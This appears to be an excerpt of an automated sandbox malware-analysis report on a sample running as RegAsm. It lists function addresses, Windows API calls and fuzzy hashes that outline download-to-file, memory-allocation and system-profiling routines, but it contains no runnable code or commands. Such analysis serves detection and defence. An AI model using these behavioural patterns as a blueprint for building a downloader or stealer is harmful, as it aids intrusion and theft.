                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00413452: _EH_prolog.MSVCRT ref: 00413457
                                                                                                                                                                                                  • Part of subcall function 00413452: CreateThread.KERNEL32(00000000,00000000,0041224D,?,00000000,00000000), ref: 004134FD
                                                                                                                                                                                                  • Part of subcall function 00413452: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413505
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$lstrlen$lstrcat$CreateObjectSingleThreadWait
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3193997572-0
                                                                                                                                                                                                • Opcode ID: aa30eeed4bc7dac8cae5baff6477bb5d9dcc111a12ef166f0b5fbb837fd81543
                                                                                                                                                                                                • Instruction ID: 20d53aa34b81a93204c6663b7f22e2839dc83b0775b4e1a5468bce4c384ac1c7
                                                                                                                                                                                                • Opcode Fuzzy Hash: aa30eeed4bc7dac8cae5baff6477bb5d9dcc111a12ef166f0b5fbb837fd81543
                                                                                                                                                                                                • Instruction Fuzzy Hash: E3A17070804148EACB05EBE6D955FEDBBB5AF29304F1044AEE446731C2DB381B18DB36
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00410DD7 Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 657COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00410DDC
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00404E01: _EH_prolog.MSVCRT ref: 00404E06
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404E55
                                                                                                                                                                                                  • Part of subcall function 00404E01: StrCmpCA.SHLWAPI(?), ref: 00404E6F
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetOpenUrlA.WININET(?,00000000,00000000,00000000,-00800100,00000000), ref: 00404E93
                                                                                                                                                                                                  • Part of subcall function 00404E01: CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00404EB4
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404EFF
                                                                                                                                                                                                  • Part of subcall function 00404E01: CloseHandle.KERNEL32(?,?,00000400), ref: 00404F19
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetCloseHandle.WININET(00000000), ref: 00404F20
                                                                                                                                                                                                  • Part of subcall function 00404E01: InternetCloseHandle.WININET(?), ref: 00404F29
                                                                                                                                                                                                  • Part of subcall function 00404E01: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00404EDB
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prologInternetlstrcpy$CloseFileHandle$Openlstrcat$CreateReadWritelstrlen
                                                                                                                                                                                                • String ID: B
                                                                                                                                                                                                • API String ID: 1244342732-1255198513
                                                                                                                                                                                                • Opcode ID: 324544c4bad2dee823ecc960884b3d64476df60fc2fdc29d288224dbe24d92ba
                                                                                                                                                                                                • Instruction ID: b60c9e6c074299f836346ddbc8f3b1801eaeb38e4f6ef2cf0ab467e1a8c8ed7a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 324544c4bad2dee823ecc960884b3d64476df60fc2fdc29d288224dbe24d92ba
                                                                                                                                                                                                • Instruction Fuzzy Hash: 40529B70905288EADB05E7E6C956FDCBBB56F29308F1044AEE445732C2DB781B08DB76
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040A9CD Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040A9D2
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 00410DD7: _EH_prolog.MSVCRT ref: 00410DDC
                                                                                                                                                                                                  • Part of subcall function 00406531: _EH_prolog.MSVCRT ref: 00406536
                                                                                                                                                                                                  • Part of subcall function 00406531: GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00424B9C,?,?,?,00424B97,00000000), ref: 004065F3
                                                                                                                                                                                                  • Part of subcall function 00406531: SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00424BA0,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00424B9B), ref: 0040666B
                                                                                                                                                                                                  • Part of subcall function 00406531: LoadLibraryA.KERNEL32(00000000), ref: 00406686
                                                                                                                                                                                                  • Part of subcall function 00409531: _EH_prolog.MSVCRT ref: 00409536
                                                                                                                                                                                                  • Part of subcall function 00409531: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00424E1C,?,?,00424BFA,00000000), ref: 004095B3
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00424E20), ref: 004095D0
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00424E24), ref: 004095EA
                                                                                                                                                                                                  • Part of subcall function 00409531: StrCmpCA.SHLWAPI(?,00000000,?,?,?,00424E28,?,?,00424BFB), ref: 00409681
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog$lstrcpy$EnvironmentFileVariablelstrcat$AttributesFindFirstFolderLibraryLoadPathlstrlen
                                                                                                                                                                                                • String ID: \..\
                                                                                                                                                                                                • API String ID: 1701172651-4220915743
                                                                                                                                                                                                • Opcode ID: b772c2a2e400509bce44cfd7e628216374ce88d2679811f26c0ccdd0640c47d1
                                                                                                                                                                                                • Instruction ID: d4a3a95d9eb8acf38289eb4a3dd745c7f014d657264399f41b6c589d77bee939
                                                                                                                                                                                                • Opcode Fuzzy Hash: b772c2a2e400509bce44cfd7e628216374ce88d2679811f26c0ccdd0640c47d1
                                                                                                                                                                                                • Instruction Fuzzy Hash: CD819770801288EACB05EBE6C556BDDBF74AF15308F54446FE441732C2DB781718CBA6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00405DB5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405EE4), ref: 00405E34
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 544645111-3916222277
                                                                                                                                                                                                • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                                                                                                                                • Instruction ID: 37a58eeab65d3aafdbf6c8aaf8a854ca426e677cf365e9249ccdf1e7d7c71616
                                                                                                                                                                                                • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                                                                                                                                • Instruction Fuzzy Hash: 45114C71510A09ABDB20CF94D5887ABB7E5FB04344F644437A581E22C0C778AB45EFE9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FD0C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FolderPathlstrcpy
                                                                                                                                                                                                • String ID: {LB
                                                                                                                                                                                                • API String ID: 1699248803-1677426198
                                                                                                                                                                                                • Opcode ID: 9bce084ea503f2f3264fa4f7026c85963b9dab8cacfbffe4a34e273a01796e77
                                                                                                                                                                                                • Instruction ID: 4d68b9eb25852d0386bd4aac983ad4fe5d220006a8c0922340419ef121009bf9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bce084ea503f2f3264fa4f7026c85963b9dab8cacfbffe4a34e273a01796e77
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF01C7990014CABDB51DB64C8909EDB7FDEBC4700F0085A6A90593290D6309F459B50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040F4EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 0040F500
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProfile
                                                                                                                                                                                                • String ID: Unknown
                                                                                                                                                                                                • API String ID: 2104809126-1654365787
                                                                                                                                                                                                • Opcode ID: 7596214ed6e52343cb5c4152aaec98c1a80735e92ae587c46db3da170d6e3bfc
                                                                                                                                                                                                • Instruction ID: 69bf318aa110a76255beb91b381982b2f967d7b3d0ae06d46d043a16d20980f7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7596214ed6e52343cb5c4152aaec98c1a80735e92ae587c46db3da170d6e3bfc
                                                                                                                                                                                                • Instruction Fuzzy Hash: 52E08C30A00108BBCB20EFA0E845BA937AC7B4434DF504035E401E31C2DA38E6089BA9
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C04D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • failed to allocate %u bytes of memory, xrefs: 1B4C04E7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                                • API String ID: 0-1168259600
                                                                                                                                                                                                • Opcode ID: 09d97e8837d15127eefebe476e41540606ca2b78331a4dc7e407629eda79808a
                                                                                                                                                                                                • Instruction ID: d492add6ba93f778824c49c57a0d1e1d87d22bb1b8be8921b3db0bf0a8d324b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 09d97e8837d15127eefebe476e41540606ca2b78331a4dc7e407629eda79808a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 85D01276E8823273DA311190FC07BCF7D514B655A1F058179FD4C59360D555AC9187D2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0040FCC8 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AttributesFileH_prolog
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3244726999-0
                                                                                                                                                                                                • Opcode ID: 40946a03df42324b650a58324985e78e04aa3f5453ad4174b3099d50faa63205
                                                                                                                                                                                                • Instruction ID: 9d4e949b1c325ac8657719951a4449db450381673e1cbb28aff76c4200e4b283
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40946a03df42324b650a58324985e78e04aa3f5453ad4174b3099d50faa63205
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FE09270900218DBCB24EB68C4026CDBB24FF15764F20863AFC63B26D1C7388B4AD684
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00405A9F Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405EA1,00000000,00000000), ref: 00405AFE
                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405EA1,00000000,00000000), ref: 00405B2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
